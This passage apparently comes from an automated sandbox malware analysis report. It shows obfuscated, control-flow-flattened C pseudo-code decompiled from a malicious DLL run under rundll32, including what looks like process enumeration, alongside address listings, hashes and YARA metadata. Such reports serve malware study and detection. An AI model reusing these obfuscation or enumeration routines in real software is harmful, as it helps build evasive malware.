							E007AE32E(_v1612, __eflags, _t379, _v1588,  &_v1040, _v1628, _t385 + 0x23c, _v1676,  &_v520, _v1660, _v1604, _v1636, _t436, _t382 + 0x1c,  &_v1560);
							E0079A8B0(_v1704, _t379, _v1576);
							_t449 =  &(_t449[0xf]);
							_t396 = 0x9d0e956;
							continue;
						} else {
							if(_t396 == 0x9368da1) {
								_push(_v1644);
								_push(_v1584);
								_push(_v1700);
								_push( &_v1040);
								E007A46BB(_v1692, _v1668);
								_t449 = _t449 - 0xc + 0x1c;
								_t396 = 0x196a97b;
								continue;
							} else {
								_t456 = _t396 - 0x9d0e956;
								if(_t396 != 0x9d0e956) {
									goto L10;
								} else {
									_push(_v1600);
									_push(_t436);
									_push(_t396);
									_push(_t436);
									_push(_t436);
									_push(_v1616);
									_push( &_v520);
									E0079AB87(_v1592, _v1608, _t456);
									_t436 =  !=  ? 1 : _t436;
								}
							}
						}
						L6:
						return _t436;
					}
					_push(_v1620);
					_push(_v1632);
					_t370 = E007ADCF7(_v1624, 0x791020, __eflags);
					E007A176B( &_v1560, __eflags);
					_t399 =  *0x7b3e10; // 0x0
					_t336 = _t399 + 0x1c; // 0x1c
					_t337 = _t399 + 0x23c; // 0x23c
					E007A1652(_v1580, __eflags, _t337, _t336, _v1664, _v1672, _t370, 0x104,  &_v520, _v1680,  &_v1040, _v1688,  &_v1560, _v1696);
					E0079A8B0(_v1640, _t370, _v1648);
					_t449 =  &(_t449[0xf]);
					_t396 = 0x9d0e956;
					L10:
					__eflags = _t396 - 0xce3b296;
				} while (__eflags != 0);
				goto L6;
			}




























































                                                                                                                          0x007acb65
                                                                                                                          0x007acb6c
                                                                                                                          0x007acb6e
                                                                                                                          0x007acb75
                                                                                                                          0x007acb7c
                                                                                                                          0x007acb7d
                                                                                                                          0x007acb7e
                                                                                                                          0x007acb83
                                                                                                                          0x007acb8e
                                                                                                                          0x007acb91
                                                                                                                          0x007acb9a
                                                                                                                          0x007acba1
                                                                                                                          0x007acba6
                                                                                                                          0x007acbb1
                                                                                                                          0x007acbbc
                                                                                                                          0x007acbc7
                                                                                                                          0x007acbd5
                                                                                                                          0x007acbd8
                                                                                                                          0x007acbdc
                                                                                                                          0x007acbe4
                                                                                                                          0x007acbec
                                                                                                                          0x007acbf4
                                                                                                                          0x007acbfc
                                                                                                                          0x007acc04
                                                                                                                          0x007acc0c
                                                                                                                          0x007acc11
                                                                                                                          0x007acc19
                                                                                                                          0x007acc21
                                                                                                                          0x007acc29
                                                                                                                          0x007acc31
                                                                                                                          0x007acc36
                                                                                                                          0x007acc3e
                                                                                                                          0x007acc46
                                                                                                                          0x007acc4e
                                                                                                                          0x007acc56
                                                                                                                          0x007acc5e
                                                                                                                          0x007acc66
                                                                                                                          0x007acc6e
                                                                                                                          0x007acc76
                                                                                                                          0x007acc7e
                                                                                                                          0x007acc86
                                                                                                                          0x007acc93
                                                                                                                          0x007acc97
                                                                                                                          0x007acc9f
                                                                                                                          0x007acca7
                                                                                                                          0x007accaf
                                                                                                                          0x007accb7
                                                                                                                          0x007accbf
                                                                                                                          0x007accc7
                                                                                                                          0x007accd4
                                                                                                                          0x007accd8
                                                                                                                          0x007acce0
                                                                                                                          0x007acce8
                                                                                                                          0x007accf0
                                                                                                                          0x007accfb
                                                                                                                          0x007acd06
                                                                                                                          0x007acd11
                                                                                                                          0x007acd19
                                                                                                                          0x007acd23
                                                                                                                          0x007acd27
                                                                                                                          0x007acd2f
                                                                                                                          0x007acd37
                                                                                                                          0x007acd44
                                                                                                                          0x007acd48
                                                                                                                          0x007acd50
                                                                                                                          0x007acd58
                                                                                                                          0x007acd60
                                                                                                                          0x007acd68
                                                                                                                          0x007acd75
                                                                                                                          0x007acd7b
                                                                                                                          0x007acd83
                                                                                                                          0x007acd8b
                                                                                                                          0x007acd93
                                                                                                                          0x007acd9b
                                                                                                                          0x007acda0
                                                                                                                          0x007acda8
                                                                                                                          0x007acdb0
                                                                                                                          0x007acdb5
                                                                                                                          0x007acdbd
                                                                                                                          0x007acdc5
                                                                                                                          0x007acdcd
                                                                                                                          0x007acdd5
                                                                                                                          0x007acde1
                                                                                                                          0x007acde4
                                                                                                                          0x007acde8
                                                                                                                          0x007acded
                                                                                                                          0x007acdf5
                                                                                                                          0x007ace02
                                                                                                                          0x007ace06
                                                                                                                          0x007ace0e
                                                                                                                          0x007ace16
                                                                                                                          0x007ace1e
                                                                                                                          0x007ace29
                                                                                                                          0x007ace34
                                                                                                                          0x007ace3f
                                                                                                                          0x007ace47
                                                                                                                          0x007ace54
                                                                                                                          0x007ace58
                                                                                                                          0x007ace60
                                                                                                                          0x007ace68
                                                                                                                          0x007ace70
                                                                                                                          0x007ace7a
                                                                                                                          0x007ace7d
                                                                                                                          0x007ace81
                                                                                                                          0x007ace89
                                                                                                                          0x007ace91
                                                                                                                          0x007ace99
                                                                                                                          0x007acea1
                                                                                                                          0x007acea5
                                                                                                                          0x007aceaa
                                                                                                                          0x007aceb2
                                                                                                                          0x007aceba
                                                                                                                          0x007acec2
                                                                                                                          0x007aceca
                                                                                                                          0x007acecf
                                                                                                                          0x007aced7
                                                                                                                          0x007acee2
                                                                                                                          0x007aceed
                                                                                                                          0x007acef8
                                                                                                                          0x007acf00
                                                                                                                          0x007acf09
                                                                                                                          0x007acf0e
                                                                                                                          0x007acf14
                                                                                                                          0x007acf1c
                                                                                                                          0x007acf24
                                                                                                                          0x007acf29
                                                                                                                          0x007acf35
                                                                                                                          0x007acf38
                                                                                                                          0x007acf3c
                                                                                                                          0x007acf44
                                                                                                                          0x007acf4c
                                                                                                                          0x007acf51
                                                                                                                          0x007acf5b
                                                                                                                          0x007acf65
                                                                                                                          0x007acf72
                                                                                                                          0x007acf7a
                                                                                                                          0x007acf7f
                                                                                                                          0x007acf87
                                                                                                                          0x007acf8f
                                                                                                                          0x007acf97
                                                                                                                          0x007acf9f
                                                                                                                          0x007acfa7
                                                                                                                          0x007acfaf
                                                                                                                          0x007acfbd
                                                                                                                          0x007acfc2
                                                                                                                          0x007acfcd
                                                                                                                          0x007acfd0
                                                                                                                          0x007acfd4
                                                                                                                          0x007acfdc
                                                                                                                          0x007acfe7
                                                                                                                          0x007acfef
                                                                                                                          0x007acff6
                                                                                                                          0x007ad001
                                                                                                                          0x007ad014
                                                                                                                          0x007ad01b
                                                                                                                          0x007ad026
                                                                                                                          0x007ad02e
                                                                                                                          0x007ad036
                                                                                                                          0x007ad03e
                                                                                                                          0x007ad046
                                                                                                                          0x007ad056
                                                                                                                          0x007ad05e
                                                                                                                          0x007ad061
                                                                                                                          0x007ad065
                                                                                                                          0x007ad06d
                                                                                                                          0x007ad075
                                                                                                                          0x007ad07a
                                                                                                                          0x007ad082
                                                                                                                          0x007ad082
                                                                                                                          0x007ad090
                                                                                                                          0x007ad119
                                                                                                                          0x007ad122
                                                                                                                          0x007ad12d
                                                                                                                          0x007ad13b
                                                                                                                          0x007ad149
                                                                                                                          0x007ad16e
                                                                                                                          0x007ad19b
                                                                                                                          0x007ad1ad
                                                                                                                          0x007ad1b2
                                                                                                                          0x007ad1b5
                                                                                                                          0x00000000
                                                                                                                          0x007ad096
                                                                                                                          0x007ad09c
                                                                                                                          0x007ad0e8
                                                                                                                          0x007ad0f3
                                                                                                                          0x007ad0fa
                                                                                                                          0x007ad109
                                                                                                                          0x007ad10a
                                                                                                                          0x007ad10f
                                                                                                                          0x007ad112
                                                                                                                          0x00000000
                                                                                                                          0x007ad09e
                                                                                                                          0x007ad09e
                                                                                                                          0x007ad0a0
                                                                                                                          0x00000000
                                                                                                                          0x007ad0a6
                                                                                                                          0x007ad0a6
                                                                                                                          0x007ad0b1
                                                                                                                          0x007ad0b2
                                                                                                                          0x007ad0b3
                                                                                                                          0x007ad0b4
                                                                                                                          0x007ad0b5
                                                                                                                          0x007ad0ca
                                                                                                                          0x007ad0cb
                                                                                                                          0x007ad0d8
                                                                                                                          0x007ad0d8
                                                                                                                          0x007ad0a0
                                                                                                                          0x007ad09c
                                                                                                                          0x007ad0db
                                                                                                                          0x007ad0e7
                                                                                                                          0x007ad0e7
                                                                                                                          0x007ad1bc
                                                                                                                          0x007ad1c5
                                                                                                                          0x007ad1cd
                                                                                                                          0x007ad1db
                                                                                                                          0x007ad212
                                                                                                                          0x007ad21f
                                                                                                                          0x007ad223
                                                                                                                          0x007ad22e
                                                                                                                          0x007ad243
                                                                                                                          0x007ad248
                                                                                                                          0x007ad24b
                                                                                                                          0x007ad24d
                                                                                                                          0x007ad24d
                                                                                                                          0x007ad24d
                                                                                                                          0x00000000

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: FolderPath
                                                                                                                          • String ID: ;@B$C""$M$O_2$[L $\WaD$I
                                                                                                                          • API String ID: 1514166925-27743949
                                                                                                                          • Opcode ID: 124217ace7c1964df63d3e8e2c1faf17c24f6f3ef739bf719e6462c28bea3ff2
                                                                                                                          • Instruction ID: bdc0bddb3f8c2f8158807019dffd83c3bb8ba633106fe5aa80c594ac41f6da57
                                                                                                                          • Opcode Fuzzy Hash: 124217ace7c1964df63d3e8e2c1faf17c24f6f3ef739bf719e6462c28bea3ff2
                                                                                                                          • Instruction Fuzzy Hash: C8021EB15093819FD364CF25C98AA8BFBE1FBC4718F10891DF1DA86260D7B5894ACF52
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0079E5CF Relevance: 9.0, Strings: 7, Instructions: 204COMMONCrypto
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 96%
                                                                                                                          			E0079E5CF(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				void* _t170;
				void* _t181;
				void* _t184;
				void* _t189;
				void* _t192;
				void* _t195;
				void* _t197;
				void* _t220;
				signed int _t221;
				signed int _t222;
				signed int _t223;
				signed int* _t226;

				_push(_a8);
				_t219 = _a4;
				_t195 = __ecx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E007A20B9(_t170);
				_v56 = 0xa4c651;
				_t226 =  &(( &_v116)[4]);
				_v56 = _v56 ^ 0x6a6d8bac;
				_v56 = _v56 ^ 0x6ac6bd64;
				_t220 = 0;
				_v60 = 0xbac055;
				_t197 = 0xf39239f;
				_v60 = _v60 << 0xd;
				_v60 = _v60 ^ 0x580542e6;
				_v108 = 0xd580f5;
				_v108 = _v108 ^ 0x97cdda0d;
				_v108 = _v108 + 0x37dd;
				_v108 = _v108 >> 0xe;
				_v108 = _v108 ^ 0x00021113;
				_v52 = 0xf28435;
				_v52 = _v52 | 0x057a1a90;
				_v52 = _v52 ^ 0x05fdc129;
				_v80 = 0x5c8bc8;
				_t221 = 0x27;
				_v80 = _v80 / _t221;
				_t222 = 0x1b;
				_v80 = _v80 * 9;
				_v80 = _v80 ^ 0x0013f028;
				_v96 = 0x281d9a;
				_v96 = _v96 + 0xffff8f77;
				_v96 = _v96 + 0x4719;
				_v96 = _v96 << 0xf;
				_v96 = _v96 ^ 0xfa152b1c;
				_v112 = 0x7415d8;
				_v112 = _v112 >> 0xf;
				_v112 = _v112 + 0xfffff76c;
				_v112 = _v112 >> 0xd;
				_v112 = _v112 ^ 0x000d779a;
				_v88 = 0xb68707;
				_v88 = _v88 ^ 0x45e0ecf4;
				_v88 = _v88 + 0xffff71c0;
				_v88 = _v88 ^ 0x455519c2;
				_v116 = 0xceabf6;
				_v116 = _v116 + 0x1225;
				_v116 = _v116 / _t222;
				_v116 = _v116 >> 6;
				_v116 = _v116 ^ 0x0006e3bb;
				_v84 = 0xd525a4;
				_v84 = _v84 + 0xffff1243;
				_v84 = _v84 + 0x1c30;
				_v84 = _v84 ^ 0x00df7efc;
				_v100 = 0xf29ecf;
				_v100 = _v100 << 0xc;
				_v100 = _v100 + 0xffff4e95;
				_v100 = _v100 ^ 0x70d6065d;
				_v100 = _v100 ^ 0x593d89f0;
				_v104 = 0x2206c6;
				_v104 = _v104 | 0x38687435;
				_v104 = _v104 ^ 0xadcf411b;
				_v104 = _v104 ^ 0x9549ac77;
				_v104 = _v104 ^ 0x00e3f730;
				_v92 = 0xd38a43;
				_v92 = _v92 >> 3;
				_v92 = _v92 + 0x6fd1;
				_v92 = _v92 ^ 0x0012c73c;
				_v64 = 0x625266;
				_v64 = _v64 + 0x2436;
				_v64 = _v64 ^ 0x006987c3;
				_v68 = 0xe296bd;
				_v68 = _v68 << 0xd;
				_v68 = _v68 ^ 0x52d9a139;
				_v72 = 0x54a2fd;
				_v72 = _v72 << 0xd;
				_v72 = _v72 >> 0xa;
				_v72 = _v72 ^ 0x002b3e4c;
				_v76 = 0x32cdcd;
				_v76 = _v76 << 0xb;
				_t223 = 0x32;
				_v76 = _v76 / _t223;
				_v76 = _v76 ^ 0x0302c408;
				_v48 = 0x2d2164;
				_v48 = _v48 + 0xfffff0e0;
				_v48 = _v48 ^ 0x0021ab5a;
				do {
					while(_t197 != 0x2168849) {
						if(_t197 == 0x29fa3de) {
							_t184 = E00792A21(_v84, _v100,  &_v44, _t219 + 0x20, _v104);
							_t226 =  &(_t226[3]);
							__eflags = _t184;
							if(__eflags != 0) {
								_t197 = 0x74ac459;
								continue;
							}
						} else {
							if(_t197 == 0x545de14) {
								E00793DBC( &_v44, _t195, _v56, _v60, _v108);
								_t226 =  &(_t226[3]);
								_t197 = 0x2168849;
								continue;
							} else {
								if(_t197 == 0x6ab10c5) {
									_t189 = E00792A21(_v112, _v88,  &_v44, _t219 + 0x1c, _v116);
									_t226 =  &(_t226[3]);
									__eflags = _t189;
									if(__eflags != 0) {
										_t197 = 0x29fa3de;
										continue;
									}
								} else {
									if(_t197 == 0x74ac459) {
										_t192 = E00792A21(_v92, _v64,  &_v44, _t219 + 0x28, _v68);
										_t226 =  &(_t226[3]);
										__eflags = _t192;
										if(__eflags != 0) {
											_t197 = 0x9dbfb8a;
											continue;
										}
									} else {
										if(_t197 == 0x9dbfb8a) {
											__eflags = E007AD97D( &_v44, _v72, __eflags, _v76, _t219 + 4, _v48);
											_t220 =  !=  ? 1 : _t220;
										} else {
											if(_t197 != 0xf39239f) {
												goto L19;
											} else {
												_t197 = 0x545de14;
												continue;
											}
										}
									}
								}
							}
						}
						L22:
						return _t220;
					}
					_t181 = E00792A21(_v52, _v80,  &_v44, _t219 + 0x14, _v96);
					_t226 =  &(_t226[3]);
					__eflags = _t181;
					if(__eflags == 0) {
						_t197 = 0x90a774d;
						goto L19;
					} else {
						_t197 = 0x6ab10c5;
						continue;
					}
					goto L22;
					L19:
					__eflags = _t197 - 0x90a774d;
				} while (__eflags != 0);
				goto L22;
			}


































                                                                                                                          0x0079e5d6
                                                                                                                          0x0079e5dd
                                                                                                                          0x0079e5e4
                                                                                                                          0x0079e5e6
                                                                                                                          0x0079e5e7
                                                                                                                          0x0079e5e8
                                                                                                                          0x0079e5e9
                                                                                                                          0x0079e5ee
                                                                                                                          0x0079e5f6
                                                                                                                          0x0079e5f9
                                                                                                                          0x0079e603
                                                                                                                          0x0079e60b
                                                                                                                          0x0079e60d
                                                                                                                          0x0079e615
                                                                                                                          0x0079e61a
                                                                                                                          0x0079e61f
                                                                                                                          0x0079e627
                                                                                                                          0x0079e62f
                                                                                                                          0x0079e637
                                                                                                                          0x0079e63f
                                                                                                                          0x0079e644
                                                                                                                          0x0079e64c
                                                                                                                          0x0079e654
                                                                                                                          0x0079e65c
                                                                                                                          0x0079e664
                                                                                                                          0x0079e672
                                                                                                                          0x0079e677
                                                                                                                          0x0079e682
                                                                                                                          0x0079e683
                                                                                                                          0x0079e687
                                                                                                                          0x0079e68f
                                                                                                                          0x0079e697
                                                                                                                          0x0079e69f
                                                                                                                          0x0079e6a7
                                                                                                                          0x0079e6ac
                                                                                                                          0x0079e6b4
                                                                                                                          0x0079e6bc
                                                                                                                          0x0079e6c1
                                                                                                                          0x0079e6c9
                                                                                                                          0x0079e6ce
                                                                                                                          0x0079e6d6
                                                                                                                          0x0079e6de
                                                                                                                          0x0079e6e6
                                                                                                                          0x0079e6ee
                                                                                                                          0x0079e6f6
                                                                                                                          0x0079e6fe
                                                                                                                          0x0079e70c
                                                                                                                          0x0079e710
                                                                                                                          0x0079e715
                                                                                                                          0x0079e71d
                                                                                                                          0x0079e725
                                                                                                                          0x0079e72d
                                                                                                                          0x0079e735
                                                                                                                          0x0079e73d
                                                                                                                          0x0079e745
                                                                                                                          0x0079e74a
                                                                                                                          0x0079e752
                                                                                                                          0x0079e75a
                                                                                                                          0x0079e762
                                                                                                                          0x0079e76a
                                                                                                                          0x0079e772
                                                                                                                          0x0079e77a
                                                                                                                          0x0079e782
                                                                                                                          0x0079e78a
                                                                                                                          0x0079e792
                                                                                                                          0x0079e797
                                                                                                                          0x0079e79f
                                                                                                                          0x0079e7a7
                                                                                                                          0x0079e7af
                                                                                                                          0x0079e7b9
                                                                                                                          0x0079e7c1
                                                                                                                          0x0079e7c9
                                                                                                                          0x0079e7ce
                                                                                                                          0x0079e7d6
                                                                                                                          0x0079e7de
                                                                                                                          0x0079e7e3
                                                                                                                          0x0079e7e8
                                                                                                                          0x0079e7f0
                                                                                                                          0x0079e7f8
                                                                                                                          0x0079e803
                                                                                                                          0x0079e80b
                                                                                                                          0x0079e80f
                                                                                                                          0x0079e817
                                                                                                                          0x0079e81f
                                                                                                                          0x0079e827
                                                                                                                          0x0079e82f
                                                                                                                          0x0079e82f
                                                                                                                          0x0079e83d
                                                                                                                          0x0079e90f
                                                                                                                          0x0079e914
                                                                                                                          0x0079e917
                                                                                                                          0x0079e919
                                                                                                                          0x0079e91b
                                                                                                                          0x00000000
                                                                                                                          0x0079e91b
                                                                                                                          0x0079e843
                                                                                                                          0x0079e849
                                                                                                                          0x0079e8e8
                                                                                                                          0x0079e8ed
                                                                                                                          0x0079e8f0
                                                                                                                          0x00000000
                                                                                                                          0x0079e84f
                                                                                                                          0x0079e855
                                                                                                                          0x0079e8bf
                                                                                                                          0x0079e8c4
                                                                                                                          0x0079e8c7
                                                                                                                          0x0079e8c9
                                                                                                                          0x0079e8cf
                                                                                                                          0x00000000
                                                                                                                          0x0079e8cf
                                                                                                                          0x0079e857
                                                                                                                          0x0079e85d
                                                                                                                          0x0079e893
                                                                                                                          0x0079e898
                                                                                                                          0x0079e89b
                                                                                                                          0x0079e89d
                                                                                                                          0x0079e8a3
                                                                                                                          0x00000000
                                                                                                                          0x0079e8a3
                                                                                                                          0x0079e85f
                                                                                                                          0x0079e865
                                                                                                                          0x0079e982
                                                                                                                          0x0079e984
                                                                                                                          0x0079e86b
                                                                                                                          0x0079e871
                                                                                                                          0x00000000
                                                                                                                          0x0079e877
                                                                                                                          0x0079e877
                                                                                                                          0x00000000
                                                                                                                          0x0079e877
                                                                                                                          0x0079e871
                                                                                                                          0x0079e865
                                                                                                                          0x0079e85d
                                                                                                                          0x0079e855
                                                                                                                          0x0079e849
                                                                                                                          0x0079e988
                                                                                                                          0x0079e990
                                                                                                                          0x0079e990
                                                                                                                          0x0079e93a
                                                                                                                          0x0079e93f
                                                                                                                          0x0079e942
                                                                                                                          0x0079e944
                                                                                                                          0x0079e950
                                                                                                                          0x00000000
                                                                                                                          0x0079e946
                                                                                                                          0x0079e946
                                                                                                                          0x00000000
                                                                                                                          0x0079e946
                                                                                                                          0x00000000
                                                                                                                          0x0079e955
                                                                                                                          0x0079e955
                                                                                                                          0x0079e955
                                                                                                                          0x00000000

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: 5th8$6$$L>+$Mw$Mw$d!-$fRb
                                                                                                                          • API String ID: 0-2045295228
                                                                                                                          • Opcode ID: 6f2f31d65536ce47fea8f5922934b6de45e61ae0ad55fa75fcdf554af6f56bec
                                                                                                                          • Instruction ID: 2ca2a06f58d880fa27358b740c9c8abe9469b146f552e3982ba3727c8d6ee7b0
                                                                                                                          • Opcode Fuzzy Hash: 6f2f31d65536ce47fea8f5922934b6de45e61ae0ad55fa75fcdf554af6f56bec
                                                                                                                          • Instruction Fuzzy Hash: F29164B2508341ABCB94CE61D88982BFBE5FBD4758F005A1DF58292221D7B5DA19CF83
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0079E2CC Relevance: 8.9, Strings: 7, Instructions: 178COMMONCrypto
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 92%
                                                                                                                          			E0079E2CC(void* __edx, intOrPtr _a8, intOrPtr _a12) {
				char _v556;
				intOrPtr _v576;
				char _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				signed int _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				void* __ecx;
				void* _t136;
				void* _t151;
				signed int _t153;
				signed int _t156;
				void* _t162;
				signed int _t167;
				intOrPtr _t187;
				signed int _t188;
				signed int _t189;
				signed int _t190;
				signed int _t191;
				signed int _t192;
				signed int* _t196;

				_push(_a12);
				_t187 = _a8;
				_push(_t187);
				_push(E00798E4D);
				_push(__edx);
				E007A20B9(_t136);
				_v608 = 0x1ac257;
				_t196 =  &(( &_v652)[5]);
				_v608 = _v608 ^ 0x78a3296c;
				_v608 = _v608 ^ 0x78b9eb39;
				_t162 = 0xac58df2;
				_v624 = 0x387e66;
				_t9 =  &_v624; // 0x387e66
				_t188 = 0x2e;
				_v624 =  *_t9 * 0x13;
				_v624 = _v624 / _t188;
				_v624 = _v624 ^ 0x001972d5;
				_v644 = 0x433552;
				_v644 = _v644 + 0xffffa6b6;
				_v644 = _v644 ^ 0x94defa20;
				_v644 = _v644 << 1;
				_v644 = _v644 ^ 0x293db944;
				_v652 = 0xb70b59;
				_v652 = _v652 << 0xb;
				_v652 = _v652 + 0xffff8138;
				_t189 = 0x15;
				_v652 = _v652 / _t189;
				_v652 = _v652 ^ 0x08c5a62f;
				_v616 = 0xf4782f;
				_v616 = _v616 >> 0xa;
				_v616 = _v616 + 0xffff066a;
				_v616 = _v616 ^ 0xfff8c7bc;
				_v604 = 0x656560;
				_v604 = _v604 >> 3;
				_v604 = _v604 ^ 0x0000606f;
				_v648 = 0x377d9b;
				_t190 = 0x7f;
				_v648 = _v648 / _t190;
				_v648 = _v648 + 0xfd7f;
				_v648 = _v648 + 0xffff6b0a;
				_v648 = _v648 ^ 0x00006649;
				_v636 = 0x80cedd;
				_t191 = 0x58;
				_v636 = _v636 / _t191;
				_v636 = _v636 + 0x515e;
				_v636 = _v636 ^ 0x000b92de;
				_v620 = 0x65d9bd;
				_v620 = _v620 + 0xffff4b50;
				_v620 = _v620 ^ 0xd34cfccc;
				_v620 = _v620 ^ 0xd32e4bd2;
				_v632 = 0xb89e86;
				_v632 = _v632 + 0xffffcc79;
				_t192 = 0x2f;
				_v632 = _v632 / _t192;
				_v632 = _v632 ^ 0x00046a67;
				_v628 = 0xbb1c4a;
				_v628 = _v628 >> 6;
				_v628 = _v628 >> 9;
				_v628 = _v628 ^ 0x000a4ee8;
				_v640 = 0xfd7114;
				_v640 = _v640 << 5;
				_v640 = _v640 * 0x45;
				_v640 = _v640 + 0xa2ea;
				_v640 = _v640 ^ 0x89e0c310;
				_v612 = 0x26e293;
				_v612 = _v612 >> 0xd;
				_v612 = _v612 ^ 0x00050986;
				_t193 = _v612;
				do {
					while(_t162 != 0x249e110) {
						if(_t162 == 0x48c9d54) {
							_v556 = 0x22c;
							_t153 = E007AC15D(_t193, _v652, _v616,  &_v556, _v604);
							_t196 =  &(_t196[3]);
							asm("sbb ecx, ecx");
							_t167 =  ~_t153 & 0xf758a92f;
							L13:
							_t162 = _t167 + 0xe63f1a5;
							continue;
						}
						if(_t162 == 0x5bc9ad4) {
							_t156 = E00798E4D( &_v556,  &_v600);
							asm("sbb ecx, ecx");
							_t167 =  ~_t156 & 0xf3e5ef6b;
							goto L13;
						}
						if(_t162 == 0xac58df2) {
							_v576 = _t187;
							_t162 = 0xcf1a497;
							continue;
						}
						if(_t162 != 0xcf1a497) {
							if(_t162 == 0xe63f1a5) {
								return E007A1E67(_v632, _v628, _v640, _v612, _t193);
							}
							goto L18;
						}
						_push(_t162);
						_t156 = E00795988(_t162, _v608);
						_t193 = _t156;
						if(_t156 != 0xffffffff) {
							_t162 = 0x48c9d54;
							continue;
						}
						L8:
						return _t156;
					}
					_t151 = E00792A58(_v648, _t193,  &_v556, _v636, _v620);
					_t196 =  &(_t196[3]);
					if(_t151 == 0) {
						_t162 = 0xe63f1a5;
						goto L18;
					} else {
						_t162 = 0x5bc9ad4;
						continue;
					}
					goto L8;
					L18:
				} while (_t162 != 0xad68edc);
				return _t156;
			}

































                                                                                                                          0x0079e2d6
                                                                                                                          0x0079e2dd
                                                                                                                          0x0079e2e4
                                                                                                                          0x0079e2e5
                                                                                                                          0x0079e2ea
                                                                                                                          0x0079e2ec
                                                                                                                          0x0079e2f1
                                                                                                                          0x0079e2f9
                                                                                                                          0x0079e2fc
                                                                                                                          0x0079e306
                                                                                                                          0x0079e30e
                                                                                                                          0x0079e313
                                                                                                                          0x0079e31b
                                                                                                                          0x0079e322
                                                                                                                          0x0079e325
                                                                                                                          0x0079e331
                                                                                                                          0x0079e335
                                                                                                                          0x0079e33d
                                                                                                                          0x0079e345
                                                                                                                          0x0079e34d
                                                                                                                          0x0079e355
                                                                                                                          0x0079e359
                                                                                                                          0x0079e361
                                                                                                                          0x0079e369
                                                                                                                          0x0079e36e
                                                                                                                          0x0079e37a
                                                                                                                          0x0079e37f
                                                                                                                          0x0079e385
                                                                                                                          0x0079e38d
                                                                                                                          0x0079e395
                                                                                                                          0x0079e39a
                                                                                                                          0x0079e3a2
                                                                                                                          0x0079e3aa
                                                                                                                          0x0079e3b2
                                                                                                                          0x0079e3b7
                                                                                                                          0x0079e3bf
                                                                                                                          0x0079e3cb
                                                                                                                          0x0079e3d0
                                                                                                                          0x0079e3d6
                                                                                                                          0x0079e3de
                                                                                                                          0x0079e3e6
                                                                                                                          0x0079e3ee
                                                                                                                          0x0079e3fa
                                                                                                                          0x0079e3ff
                                                                                                                          0x0079e405
                                                                                                                          0x0079e40d
                                                                                                                          0x0079e415
                                                                                                                          0x0079e41d
                                                                                                                          0x0079e425
                                                                                                                          0x0079e42d
                                                                                                                          0x0079e435
                                                                                                                          0x0079e43d
                                                                                                                          0x0079e449
                                                                                                                          0x0079e44c
                                                                                                                          0x0079e450
                                                                                                                          0x0079e458
                                                                                                                          0x0079e460
                                                                                                                          0x0079e46a
                                                                                                                          0x0079e474
                                                                                                                          0x0079e47c
                                                                                                                          0x0079e484
                                                                                                                          0x0079e48e
                                                                                                                          0x0079e492
                                                                                                                          0x0079e49a
                                                                                                                          0x0079e4a2
                                                                                                                          0x0079e4aa
                                                                                                                          0x0079e4af
                                                                                                                          0x0079e4b7
                                                                                                                          0x0079e4bb
                                                                                                                          0x0079e4bb
                                                                                                                          0x0079e4c9
                                                                                                                          0x0079e56a
                                                                                                                          0x0079e57d
                                                                                                                          0x0079e582
                                                                                                                          0x0079e589
                                                                                                                          0x0079e58b
                                                                                                                          0x0079e55b
                                                                                                                          0x0079e55b
                                                                                                                          0x00000000
                                                                                                                          0x0079e55b
                                                                                                                          0x0079e4d5
                                                                                                                          0x0079e54a
                                                                                                                          0x0079e553
                                                                                                                          0x0079e555
                                                                                                                          0x00000000
                                                                                                                          0x0079e555
                                                                                                                          0x0079e4dd
                                                                                                                          0x0079e532
                                                                                                                          0x0079e536
                                                                                                                          0x00000000
                                                                                                                          0x0079e536
                                                                                                                          0x0079e4e5
                                                                                                                          0x0079e4e9
                                                                                                                          0x00000000
                                                                                                                          0x0079e505
                                                                                                                          0x00000000
                                                                                                                          0x0079e4e9
                                                                                                                          0x0079e51b
                                                                                                                          0x0079e520
                                                                                                                          0x0079e525
                                                                                                                          0x0079e52c
                                                                                                                          0x0079e52e
                                                                                                                          0x00000000
                                                                                                                          0x0079e52e
                                                                                                                          0x0079e512
                                                                                                                          0x0079e512
                                                                                                                          0x0079e512
                                                                                                                          0x0079e5a6
                                                                                                                          0x0079e5ab
                                                                                                                          0x0079e5b0
                                                                                                                          0x0079e5bc
                                                                                                                          0x00000000
                                                                                                                          0x0079e5b2
                                                                                                                          0x0079e5b2
                                                                                                                          0x00000000
